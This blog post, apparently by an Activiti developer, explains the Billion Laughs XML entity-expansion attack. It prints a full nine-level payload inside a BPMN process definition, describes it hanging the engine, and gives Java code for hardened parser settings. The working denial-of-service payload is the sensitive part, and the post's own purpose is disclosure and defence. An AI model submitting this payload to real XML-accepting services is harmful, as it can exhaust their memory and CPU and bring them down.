Uploading a funny XML can bring down your server

By coincidence I stumbled upon the following slideware this weekend: http://portal.sliderocket.com/CJAKM/xml-attacks

In those slides, the author claims that you can craft an XML document that attacks the server parsing it. As this sounded pretty fishy, I decided to give it a try with Activiti. I created a ‘Billion Laughs attack’ as described in the link above, by dropping an entity bomb into an otherwise trivial BPMN 2.0 process definition:


<?xml version="1.0" encoding="UTF-8"?>
<!-- Billion Laughs payload: nine nested levels of eleven references each,
     so &lol9; expands to 11^9 (roughly 2.36 billion) copies of "lol". -->
<!DOCTYPE definitions [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<definitions
 xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL"
 xmlns:activiti="http://activiti.org/bpmn"
 targetNamespace="Examples">

<process id="oneTaskProcess" name="The One Task Process">
 <!-- The bomb goes off inside an ordinary text node of the process, so the
      document is well-formed (single root) and the engine must expand it. -->
 <documentation>&lol9;</documentation>

 <startEvent id="theStart" />
 <sequenceFlow id="flow1" sourceRef="theStart" targetRef="theTask" />
 <userTask id="theTask" name="my task" />
 <sequenceFlow id="flow2" sourceRef="theTask" targetRef="theEnd" />
 <endEvent id="theEnd" />

 </process>

</definitions>

This simple process (without the doctype and entity stuff) normally parses instantly. But when I added those malicious snippets of XML to my process … the engine started parsing the process … and kept parsing … and parsing … and after 15 minutes I killed the process, without it ever finishing the parsing of this simple process definition. Nothing about the file looks big, either: the whole thing is around one kilobyte, yet a naive parser has to materialise billions of copies of “lol” before it can hand the document back.

Of course, normally the XML files that are uploaded to the Activiti process engine are under the control of the developers, so typically this is a non-issue. But still. Suppose someone actually lets end users upload arbitrary BPMN 2.0 XML … just fire off a few of these processes and you’ll see the server go down very easily, since each deployment ties up a thread and a growing chunk of heap for as long as the parse runs.

I must say, I was completely flabbergasted by this. I assumed I could trust the JDK XML classes to do the right thing. But the fact is … it is pretty hard to know what the ‘right thing’ is here: the parser is doing exactly what the XML specification says a DTD and its entity declarations mean. I think many frameworks that accept XML and rely on the JDK’s XML parsing with its default settings will have this problem.

Anyway, we quickly patched the Activiti engine to not parse any doctype or resolve any entity references (and some other fixes as mentioned in the link above) (see commit) and all is unicorns and rainbows again.
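To make the two halves of this story concrete, here is an added, self-contained Java example. It is not code from this post or from the Activiti project: the class and method names are mine, and the payload is a constructed three-level variant of the one above (ten references per level instead of eleven, three levels instead of nine) so that it expands to a harmless 1,000 copies and returns instantly. The first parser is a stock JAXP `DocumentBuilder`; the second is hardened along the lines described above, refusing any DOCTYPE and switching off entity expansion and external entities. The StAX factory shows the equivalent switches for a streaming parser.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.stream.XMLInputFactory;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

public class BillionLaughsDemo {

    // Constructed, deliberately shallow variant of the payload from the post:
    // three levels of ten references instead of nine levels of eleven, so &lol3;
    // expands to 10^3 = 1000 copies of "lol" (3000 characters) and finishes
    // instantly. Every additional level multiplies the expanded size by ten.
    static final String SMALL_LAUGHS =
          "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
        + "<!DOCTYPE definitions [\n"
        + " <!ENTITY lol \"lol\">\n"
        + " <!ENTITY lol1 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">\n"
        + " <!ENTITY lol2 \"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;\">\n"
        + " <!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\">\n"
        + "]>\n"
        + "<definitions xmlns=\"http://www.omg.org/spec/BPMN/20100524/MODEL\">\n"
        + "  <process id=\"oneTaskProcess\">\n"
        + "    <documentation>&lol3;</documentation>\n"
        + "  </process>\n"
        + "</definitions>\n";

    /** Out-of-the-box JAXP: the internal DTD subset is honoured and every
     *  entity reference is expanded, which is exactly what the attack relies on. */
    static DocumentBuilder unsafeBuilder() throws ParserConfigurationException {
        return DocumentBuilderFactory.newInstance().newDocumentBuilder();
    }

    /** Hardened DOM parser. A BPMN 2.0 file never needs a DTD, so the cleanest
     *  fix is to reject any DOCTYPE outright; the remaining settings are belt
     *  and braces for parsers that do not support the first feature. */
    static DocumentBuilder safeBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setExpandEntityReferences(false);
        f.setXIncludeAware(false);
        return f.newDocumentBuilder();
    }

    /** The equivalent two switches for a StAX (streaming) parser:
     *  no DTD processing and no external entities. */
    static XMLInputFactory safeStaxFactory() {
        XMLInputFactory xif = XMLInputFactory.newInstance();
        xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        return xif;
    }

    /** Parses the document and reports how long the <documentation> text
     *  became after entity expansion. */
    static int expandedDocumentationLength(DocumentBuilder b, String xml) throws Exception {
        Document d = b.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return d.getElementsByTagName("documentation").item(0).getTextContent().length();
    }

    public static void main(String[] args) throws Exception {
        // Under 500 bytes in, 3000 characters of text out.
        System.out.println("default parser expanded the documentation to "
            + expandedDocumentationLength(unsafeBuilder(), SMALL_LAUGHS) + " characters");

        // The hardened parser fails on the DOCTYPE before a single entity is expanded.
        try {
            expandedDocumentationLength(safeBuilder(), SMALL_LAUGHS);
            System.out.println("unexpected: hardened parser accepted the DOCTYPE");
        } catch (SAXParseException e) {
            System.out.println("hardened parser rejected the document: " + e.getMessage());
        }
    }
}
```

Compile and run with plain `javac` and `java`; there are no dependencies beyond the JDK. One caveat for anyone reproducing the original 15-minute hang: since JDK 7u45 the built-in parser caps entity expansions at 64,000 by default (the `entityExpansionLimit` processing limit), so on a current JDK the full nine-level payload dies with a parse error instead of spinning. This demo stays far below that cap on purpose so the default-settings path goes through everywhere. Rejecting the DOCTYPE is still the better fix than leaning on that limit, because the same DOCTYPE mechanism is what enables external entity (XXE) declarations, and a process definition has no legitimate use for either.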

But it taught me a valuable lesson (again): never assume your code is safe. There is always someone out there with more time, more creativity and bad intentions.

3 Comments

  1. Santeri Vesalainen March 27, 2013

    Just curious is this commit https://github.com/Activiti/Activiti/commit/26cfc3b38322d40be84ce4b36fc84f9c7b4788a1#L0L167 related to http://forums.activiti.org/en/viewtopic.php?f=9&t=6148 ?

    I tried workaround mentioned in forum post “by adding xercesImpl 2.10.0 as JAR dependency.”, which was not good fix enough, Now I am trying to figure out how to configure jboss AS 7.1.3Final and this does not help me at all http://stackoverflow.com/questions/11677572/dealing-with-xerces-hell-in-java-maven

  2. Joram Barrez March 28, 2013

    @ Santeri: yes, that commit is related. We’ve re-released 5.12 very soon after the initial release: http://bpmn20inaction.blogspot.nl/2013/03/activiti-512-jdk-6-bugfix.html. Note that the title says JDK6 but it also means “JBoss” in this case.

    We’ve also made sure there is backwards compatibility: http://activiti.org/userguide/index.html#advanced.safe.bpmn.xml

    Do you still see the issue in the linked forum post with 5.12 on JBoss?

  3. Santeri Vesalainen May 2, 2013

    Thanks for the answer. Not exactly, because the problem is linked with another dependency (the built-in Xerces impl) in vaadin-client-compiler:7.0.5, yet the forum workaround works.

    Trackback URL: http://dev.vaadin.com/ticket/9851#comment:8
